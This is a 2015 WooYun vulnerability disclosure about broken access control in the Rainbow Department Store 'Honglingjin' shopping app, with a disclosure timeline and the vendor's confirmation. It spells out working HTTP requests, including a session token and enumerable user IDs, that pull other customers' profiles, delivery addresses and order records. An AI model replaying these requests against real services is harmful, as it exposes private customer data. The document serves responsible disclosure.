当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156160

漏洞标题:天虹商场红领巾最新版APP多处越权(泄露用户信息/收货地址/订单记录)

相关厂商:天虹商场

漏洞作者: 专业种田

提交时间:2015-11-26 20:55

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

可泄露所有用户信息、订单记录!
涉及用户信息及订单几十万,看ID就知道了。

详细说明:

红领巾最新版本1.1.9,多个权限未做控制,可以遍历ID越权访问所有用户信息。
1.用户信息

POST /center/member/fetch HTTP/1.1
x-http-interface-v: 1.0.0
x-http-time: 2015-11-26 19:54:50
x-http-package: cn.rainbow.westore
x-http-devicetype: android
x-http-version: 1.1.9
x-http-deviceuid: ffffffff-a95e-e042-5fcb-c4e600000000
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; MI 2 MIUI/4.12.5)
Host: member.honglingjin.cn
Connection: close
Accept-Encoding: gzip
Content-Length: 61
token=f0475aad7fd5c1c52deabe1ac84d963d&member_id=25000181159&


天虹304.png


2.收货地址

GET /center/delivery_address/list?user_id=25000183131&access_token=f0475aad7fd5c1c52deabe1ac84d963d HTTP/1.1


天虹303.png

漏洞证明:

3.订单记录
订单明细需要用户ID及订单号对应才能查看,不影响我们获取数据,因为订单列表也可以越权,通过订单列表先获取用户的订单号即可。
2个请求。

订单列表
GET /westore/order/list?user_id=25000181324&access_token=f0475aad7fd5c1c52deabe1ac84d963d&order_status=0&page_index=0&page_size=10 HTTP/1.1


天虹301.png


拼接一下,用户ID与订单ID获取订单明细

GET /westore/order/detail?user_id=25000181324&access_token=f0475aad7fd5c1c52deabe1ac84d963d&order_id=21943 HTTP/1.1

天虹302.png

修复方案:

权限控制

版权声明:转载请注明来源 专业种田@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-11-27 15:11

厂商回复:

感谢提交。

最新状态:

暂无